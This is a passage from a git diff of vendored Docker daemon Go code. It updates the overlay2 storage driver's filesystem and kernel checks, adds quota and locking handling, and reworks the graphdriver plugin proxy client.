btrfs, aufs, zfs, overlay, or ecryptfs + logger := logrus.WithField("storage-driver", "overlay2") + switch fsMagic { - case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs: - logrus.Errorf("'overlay2' is not supported over %s", backingFs) + case graphdriver.FsMagicAufs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs: + logger.Errorf("'overlay2' is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS + case graphdriver.FsMagicBtrfs: + // Support for OverlayFS on BTRFS was added in kernel 4.7 + // See https://btrfs.wiki.kernel.org/index.php/Changelog + if 
kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 7, Minor: 0}) < 0 { + if !opts.overrideKernelCheck { + logger.Errorf("'overlay2' requires kernel 4.7 to use on %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + logger.Warn("Using pre-4.7.0 kernel for overlay2 on btrfs, may require kernel update") + } } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return nil, err + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { + if opts.overrideKernelCheck { + logger.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + } else { + if err := supportsMultipleLowerDir(testdir); err != nil { + logger.Debugf("Multiple lower dirs not supported: %v", err) + return nil, graphdriver.ErrNotSupported + } + } } - // Create the driver home dir - if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + supportsDType, err := fsutils.SupportsDType(testdir) + if err != nil { return nil, err } - - if err := mount.MakePrivate(home); err != nil { - return nil, err + if !supportsDType { + if !graphdriver.IsInitialized(home) { + return nil, overlayutils.ErrDTypeNotSupported("overlay2", backingFs) + } + // allow running without d_type only for existing setups (#27443) + logger.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) } - supportsDType, err := fsutils.SupportsDType(home) + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - if !supportsDType { - // not a fatal error until v1.16 (#27443) - logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) + // Create the driver home dir + if err := idtools.MkdirAllAndChown(path.Join(home, linkDir), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } d := &Driver{ @@ -180,6 +210,8 @@ func Init(home string, options []string, uidMaps, gidMaps 
[]idtools.IDMap) (grap gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), supportsDType: supportsDType, + locker: locker.New(), + options: *opts, } d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps) @@ -188,10 +220,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap // Try to enable project quota support over xfs. if d.quotaCtl, err = quota.NewControl(home); err == nil { projectQuotaSupported = true + } else if opts.quota.Size > 0 { + return nil, fmt.Errorf("Storage option overlay2.size not supported. Filesystem does not support Project Quota: %v", err) } + } else if opts.quota.Size > 0 { + // if xfs is not the backing fs then error out if the storage-opt overlay2.size is used. + return nil, fmt.Errorf("Storage Option overlay2.size only supported for backingFS XFS. Found %v", backingFs) } - logrus.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) + logger.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) return d, nil } @@ -210,9 +247,14 @@ func parseOptions(options []string) (*overlayOptions, error) { if err != nil { return nil, err } - + case "overlay2.size": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + o.quota.Size = uint64(size) default: - return nil, fmt.Errorf("overlay2: Unknown option %s\n", key) + return nil, fmt.Errorf("overlay2: unknown option %s", key) } } return o, nil @@ -235,14 +277,14 @@ func supportsOverlay() error { return nil } } - logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + logrus.WithField("storage-driver", "overlay2").Error("'overlay' not found as a supported filesystem on this host. 
Please ensure kernel is new enough and has overlay support loaded.") return graphdriver.ErrNotSupported } func useNaiveDiff(home string) bool { useNaiveDiffLock.Do(func() { - if err := hasOpaqueCopyUpBug(home); err != nil { - logrus.Warnf("Not using native diff for overlay2: %v", err) + if err := doesSupportNativeDiff(home); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Not using native diff for overlay2, this may cause degraded performance for building images: %v", err) useNaiveDiffOnly = true } }) @@ -263,8 +305,8 @@ func (d *Driver) Status() [][2]string { } } -// GetMetadata returns meta data about the overlay driver such as -// LowerDir, UpperDir, WorkDir and MergeDir used to store data. +// GetMetadata returns metadata about the overlay driver such as the LowerDir, +// UpperDir, WorkDir, and MergeDir used to store data. func (d *Driver) GetMetadata(id string) (map[string]string, error) { dir := d.dir(id) if _, err := os.Stat(dir); err != nil { @@ -292,33 +334,56 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // is being shutdown. For now, we just have to unmount the bind mounted // we had created. func (d *Driver) Cleanup() error { - return mount.Unmount(d.home) + return mount.RecursiveUnmount(d.home) } // CreateReadWrite creates a layer that is writable for use as a container // file system. 
func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { - return d.Create(id, parent, opts) + if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { + return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + } + + if opts == nil { + opts = &graphdriver.CreateOpts{ + StorageOpt: map[string]string{}, + } + } + + if _, ok := opts.StorageOpt["size"]; !ok { + if opts.StorageOpt == nil { + opts.StorageOpt = map[string]string{} + } + opts.StorageOpt["size"] = strconv.FormatUint(d.options.quota.Size, 10) + } + + return d.create(id, parent, opts) } // Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. // The parent filesystem is used to configure these directories for the overlay. func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { - - if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { - return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + if opts != nil && len(opts.StorageOpt) != 0 { + if _, ok := opts.StorageOpt["size"]; ok { + return fmt.Errorf("--storage-opt size is only supported for ReadWrite Layers") + } } + return d.create(id, parent, opts) +} +func (d *Driver) create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { dir := d.dir(id) rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { return err } - if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + root := idtools.IDPair{UID: rootUID, GID: rootGID} + + if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil { return err } - if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0700, root); err != nil { return err } @@ -343,7 +408,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) 
(retErr } } - if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "diff"), 0755, root); err != nil { return err } @@ -362,10 +427,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr return nil } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } @@ -451,25 +513,34 @@ func (d *Driver) getLowerDirs(id string) ([]string, error) { // Remove cleans the directories that are created for this id. func (d *Driver) Remove(id string) error { + if id == "" { + return fmt.Errorf("refusing to remove the directories: id is empty") + } + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) lid, err := ioutil.ReadFile(path.Join(dir, "link")) if err == nil { - if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { - logrus.Debugf("Failed to remove link: %v", err) + if len(lid) == 0 { + logrus.WithField("storage-driver", "overlay2").Errorf("refusing to remove empty link for layer %v", id) + } else if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { + logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove link: %v", err) } } - if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + if err := system.EnsureRemoveAll(dir); err != nil && !os.IsNotExist(err) { return err } return nil } // Get creates and mounts the required file system for the given id and returns the mount path. 
-func (d *Driver) Get(id string, mountLabel string) (s string, err error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) if _, err := os.Stat(dir); err != nil { - return "", err + return nil, err } diffDir := path.Join(dir, "diff") @@ -477,19 +548,25 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { if err != nil { // If no lower, just return diff directory if os.IsNotExist(err) { - return diffDir, nil + return containerfs.NewLocalContainerFS(diffDir), nil } - return "", err + return nil, err } mergedDir := path.Join(dir, "merged") if count := d.ctr.Increment(mergedDir); count > 1 { - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } defer func() { - if err != nil { + if retErr != nil { if c := d.ctr.Decrement(mergedDir); c <= 0 { - syscall.Unmount(mergedDir, 0) + if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil { + logrus.WithField("storage-driver", "overlay2").Errorf("error unmounting %v: %v", mergedDir, mntErr) + } + // Cleanup the created merged directory; see the comment in Put's rmdir + if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove %s: %v: %v", id, rmErr, err) + } } } }() @@ -502,10 +579,18 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { } opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work")) mountData := label.FormatMountLabel(opts, mountLabel) - mount := syscall.Mount + mount := unix.Mount mountTarget := mergedDir - pageSize := syscall.Getpagesize() + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return 
nil, err + } + + pageSize := unix.Getpagesize() // Go can return a larger page size than supported by the system // as of go 1.7. This will be fixed in 1.8 and this block can be @@ -524,7 +609,7 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work")) mountData = label.FormatMountLabel(opts, mountLabel) if len(mountData) > pageSize { - return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) + return nil, fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) } mount = func(source string, target string, mType string, flags uintptr, label string) error { @@ -534,31 +619,51 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { } if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil { - return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) } // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a // user namespace requires this to move a directory from lower to upper. - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { - return "", err - } - if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { - return "", err + return nil, err } - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } // Put unmounts the mount path created for the give id. +// It also removes the 'merged' directory to force the kernel to unmount the +// overlay mount in other namespaces. 
func (d *Driver) Put(id string) error { - mountpoint := path.Join(d.dir(id), "merged") + d.locker.Lock(id) + defer d.locker.Unlock(id) + dir := d.dir(id) + _, err := ioutil.ReadFile(path.Join(dir, lowerFile)) + if err != nil { + // If no lower, no mount happened and just return directly + if os.IsNotExist(err) { + return nil + } + return err + } + + mountpoint := path.Join(dir, "merged") + logger := logrus.WithField("storage-driver", "overlay2") if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - if err := syscall.Unmount(mountpoint, 0); err != nil { - logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + } + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be unmounted. This is necessary to avoid cases where an overlay mount + // that is present in another namespace will cause subsequent mounts + // operations to fail with ebusy. We ignore any errors here because this may + // fail on older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. 
+ if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) { + logger.Debugf("Failed to remove %s overlay: %v", id, err) } return nil } @@ -569,7 +674,8 @@ func (d *Driver) Exists(id string) bool { return err == nil } -// isParent returns if the passed in parent is the direct parent of the passed in layer +// isParent determines whether the given parent is the direct parent of the +// given layer id func (d *Driver) isParent(id, parent string) bool { lowers, err := d.getLowerDirs(id) if err != nil { @@ -598,17 +704,18 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64 applyDir := d.getDiffPath(id) - logrus.Debugf("Applying tar in %s", applyDir) + logrus.WithField("storage-driver", "overlay2").Debugf("Applying tar in %s", applyDir) // Overlay doesn't need the parent id to apply the diff if err := untar(diff, applyDir, &archive.TarOptions{ UIDMaps: d.uidMaps, GIDMaps: d.gidMaps, WhiteoutFormat: archive.OverlayWhiteoutFormat, + InUserNS: rsystem.RunningInUserNS(), }); err != nil { return 0, err } - return directory.Size(applyDir) + return directory.Size(context.TODO(), applyDir) } func (d *Driver) getDiffPath(id string) string { @@ -624,7 +731,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) { if useNaiveDiff(d.home) || !d.isParent(id, parent) { return d.naiveDiff.DiffSize(id, parent) } - return directory.Size(d.getDiffPath(id)) + return directory.Size(context.TODO(), d.getDiffPath(id)) } // Diff produces an archive of the changes between the specified @@ -635,7 +742,7 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { } diffPath := d.getDiffPath(id) - logrus.Debugf("Tar with options on %s", diffPath) + logrus.WithField("storage-driver", "overlay2").Debugf("Tar with options on %s", diffPath) return archive.TarWithOptions(diffPath, &archive.TarOptions{ Compression: archive.Uncompressed, UIDMaps: d.uidMaps, @@ -644,8 +751,8 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, 
error) { }) } -// Changes produces a list of changes between the specified layer -// and its parent layer. If parent is "", then all changes will be ADD changes. +// Changes produces a list of changes between the specified layer and its +// parent layer. If parent is "", then all changes will be ADD changes. func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { if useNaiveDiff(d.home) || !d.isParent(id, parent) { return d.naiveDiff.Changes(id, parent) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go index cf77ff22be..4a07137ed8 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go @@ -1,11 +1,10 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "io/ioutil" "os" - "syscall" "testing" "github.com/docker/docker/daemon/graphdriver" @@ -23,17 +22,6 @@ func init() { reexec.Init() } -func cdMountFrom(dir, device, target, mType, label string) error { - wd, err := os.Getwd() - if err != nil { - return err - } - os.Chdir(dir) - defer os.Chdir(wd) - - return syscall.Mount(device, target, mType, 0, label) -} - func skipIfNaive(t *testing.T) { td, err := ioutil.TempDir("", "naive-check-") if err != nil { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go index e5ac4ca8c6..68b75a366a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go @@ -1,3 +1,3 @@ // +build !linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go index af5cb659d5..842c06127f 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "crypto/rand" @@ -11,7 +11,8 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // generateID creates a new random string identifier with the given length @@ -69,7 +70,7 @@ func retryOnError(err error) bool { case *os.PathError: return retryOnError(err.Err) // unpack the target error case syscall.Errno: - if err == syscall.EPERM { + if err == unix.EPERM { // EPERM represents an entropy pool exhaustion, a condition under // which we backoff and retry. return true diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go index 67c6640b4b..71f6d2d460 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go @@ -1,10 +1,11 @@ // +build linux -package overlayutils +package overlayutils // import "github.com/docker/docker/daemon/graphdriver/overlayutils" import ( - "errors" "fmt" + + "github.com/docker/docker/daemon/graphdriver" ) // ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type. @@ -13,6 +14,12 @@ func ErrDTypeNotSupported(driver, backingFs string) error { if backingFs == "xfs" { msg += " Reformat the filesystem with ftype=1 to enable d_type support." } - msg += " Running without d_type support will no longer be supported in Docker 1.16." 
- return errors.New(msg) + + if backingFs == "extfs" { + msg += " Reformat the filesystem (or use tune2fs) with -O filetype flag to enable d_type support." + } + + msg += " Backing filesystems without d_type support are not supported." + + return graphdriver.NotSupportedError(msg) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go index 7294bcc5f6..b0983c5667 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go @@ -1,28 +1,21 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "fmt" - "io" "path/filepath" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" + "github.com/pkg/errors" ) -type pluginClient interface { - // Call calls the specified method with the specified arguments for the plugin. 
- Call(string, interface{}, interface{}) error - // Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream - Stream(string, interface{}) (io.ReadCloser, error) - // SendFile calls the specified method, and passes through the IO stream - SendFile(string, io.Reader, interface{}) error -} - func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) { if !config.ExperimentalEnabled { return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode") } - pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE) + pl, err := pg.Get(name, "GraphDriver", plugingetter.Acquire) if err != nil { return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err) } @@ -33,11 +26,30 @@ func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options) home := config.Root if !pl.IsV1() { if p, ok := pl.(*v2.Plugin); ok { - if p.PropagatedMount != "" { + if p.PluginObj.Config.PropagatedMount != "" { home = p.PluginObj.Config.PropagatedMount } } } - proxy := &graphDriverProxy{name, pl} + + var proxy *graphDriverProxy + + switch pt := pl.(type) { + case plugingetter.PluginWithV1Client: + proxy = &graphDriverProxy{name, pl, Capabilities{}, pt.Client()} + case plugingetter.PluginAddr: + if pt.Protocol() != plugins.ProtocolSchemeHTTPV1 { + return nil, errors.Errorf("plugin protocol not supported: %s", pt.Protocol()) + } + addr := pt.Addr() + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pt.Timeout()) + if err != nil { + return nil, errors.Wrap(err, "error creating plugin client") + } + proxy = &graphDriverProxy{name, pl, Capabilities{}, client} + default: + return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", pt)) + } + return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps) } diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go index bfe74cc6f9..cb350d8074 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go @@ -1,19 +1,22 @@ -package graphdriver +package graphdriver // import "github.com/docker/docker/daemon/graphdriver" import ( "errors" "fmt" "io" - "path/filepath" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" ) type graphDriverProxy struct { - name string - p plugingetter.CompatPlugin + name string + p plugingetter.CompatPlugin + caps Capabilities + client *plugins.Client } type graphDriverRequest struct { @@ -24,13 +27,14 @@ type graphDriverRequest struct { } type graphDriverResponse struct { - Err string `json:",omitempty"` - Dir string `json:",omitempty"` - Exists bool `json:",omitempty"` - Status [][2]string `json:",omitempty"` - Changes []archive.Change `json:",omitempty"` - Size int64 `json:",omitempty"` - Metadata map[string]string `json:",omitempty"` + Err string `json:",omitempty"` + Dir string `json:",omitempty"` + Exists bool `json:",omitempty"` + Status [][2]string `json:",omitempty"` + Changes []archive.Change `json:",omitempty"` + Size int64 `json:",omitempty"` + Metadata map[string]string `json:",omitempty"` + Capabilities Capabilities `json:",omitempty"` } type graphDriverInitRequest struct { @@ -54,40 +58,48 @@ func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []i GIDMaps: gidMaps, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Init", args, &ret); err != nil { return err } if ret.Err != "" { return errors.New(ret.Err) } + caps, err := d.fetchCaps() + if err != nil { + return err + 
} + d.caps = caps return nil } +func (d *graphDriverProxy) fetchCaps() (Capabilities, error) { + args := &graphDriverRequest{} + var ret graphDriverResponse + if err := d.client.Call("GraphDriver.Capabilities", args, &ret); err != nil { + if !plugins.IsNotFound(err) { + return Capabilities{}, err + } + } + return ret.Capabilities, nil +} + func (d *graphDriverProxy) String() string { return d.name } -func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { - args := &graphDriverRequest{ - ID: id, - Parent: parent, - } - if opts != nil { - args.MountLabel = opts.MountLabel - args.StorageOpt = opts.StorageOpt - } +func (d *graphDriverProxy) Capabilities() Capabilities { + return d.caps +} - var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil { - return err - } - if ret.Err != "" { - return errors.New(ret.Err) - } - return nil +func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error { + return d.create("GraphDriver.CreateReadWrite", id, parent, opts) } func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { + return d.create("GraphDriver.Create", id, parent, opts) +} + +func (d *graphDriverProxy) create(method, id, parent string, opts *CreateOpts) error { args := &graphDriverRequest{ ID: id, Parent: parent, @@ -97,7 +109,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { args.StorageOpt = opts.StorageOpt } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil { + if err := d.client.Call(method, args, &ret); err != nil { return err } if ret.Err != "" { @@ -109,7 +121,7 @@ func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error { func (d *graphDriverProxy) Remove(id string) error { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil { + if 
err := d.client.Call("GraphDriver.Remove", args, &ret); err != nil { return err } if ret.Err != "" { @@ -118,26 +130,26 @@ func (d *graphDriverProxy) Remove(id string) error { return nil } -func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) { +func (d *graphDriverProxy) Get(id, mountLabel string) (containerfs.ContainerFS, error) { args := &graphDriverRequest{ ID: id, MountLabel: mountLabel, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil { - return "", err + if err := d.client.Call("GraphDriver.Get", args, &ret); err != nil { + return nil, err } var err error if ret.Err != "" { err = errors.New(ret.Err) } - return filepath.Join(d.p.BasePath(), ret.Dir), err + return containerfs.NewLocalContainerFS(d.p.ScopedPath(ret.Dir)), err } func (d *graphDriverProxy) Put(id string) error { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Put", args, &ret); err != nil { return err } if ret.Err != "" { @@ -149,7 +161,7 @@ func (d *graphDriverProxy) Put(id string) error { func (d *graphDriverProxy) Exists(id string) bool { args := &graphDriverRequest{ID: id} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Exists", args, &ret); err != nil { return false } return ret.Exists @@ -158,7 +170,7 @@ func (d *graphDriverProxy) Exists(id string) bool { func (d *graphDriverProxy) Status() [][2]string { args := &graphDriverRequest{} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Status", args, &ret); err != nil { return nil } return ret.Status @@ -169,7 +181,7 @@ func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) { ID: id, } var ret graphDriverResponse - if err := 
d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.GetMetadata", args, &ret); err != nil { return nil, err } if ret.Err != "" { @@ -188,7 +200,7 @@ func (d *graphDriverProxy) Cleanup() error { args := &graphDriverRequest{} var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Cleanup", args, &ret); err != nil { return nil } if ret.Err != "" { @@ -202,7 +214,7 @@ func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) { ID: id, Parent: parent, } - body, err := d.p.Client().Stream("GraphDriver.Diff", args) + body, err := d.client.Stream("GraphDriver.Diff", args) if err != nil { return nil, err } @@ -215,7 +227,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) Parent: parent, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.Changes", args, &ret); err != nil { return nil, err } if ret.Err != "" { @@ -227,7 +239,7 @@ func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { var ret graphDriverResponse - if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { + if err := d.client.SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil { return -1, err } if ret.Err != "" { @@ -242,7 +254,7 @@ func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) { Parent: parent, } var ret graphDriverResponse - if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil { + if err := d.client.Call("GraphDriver.DiffSize", args, &ret); err != nil { return -1, err } if ret.Err != "" { diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go new file mode 100644 index 0000000000..68e797470d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go @@ -0,0 +1,19 @@ +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" + +import "github.com/docker/docker/errdefs" + +var ( + _ errdefs.ErrNotImplemented = (*errQuotaNotSupported)(nil) +) + +// ErrQuotaNotSupported indicates if were found the FS didn't have projects quotas available +var ErrQuotaNotSupported = errQuotaNotSupported{} + +type errQuotaNotSupported struct { +} + +func (e errQuotaNotSupported) NotImplemented() {} + +func (e errQuotaNotSupported) Error() string { + return "Filesystem does not support, or has not enabled quotas" +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go index e408d5f906..93e85823af 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go @@ -9,7 +9,7 @@ // for both xfs/ext4 for kernel version >= v4.5 // -package quota +package quota // import "github.com/docker/docker/daemon/graphdriver/quota" /* #include @@ -47,18 +47,20 @@ struct fsxattr { #ifndef 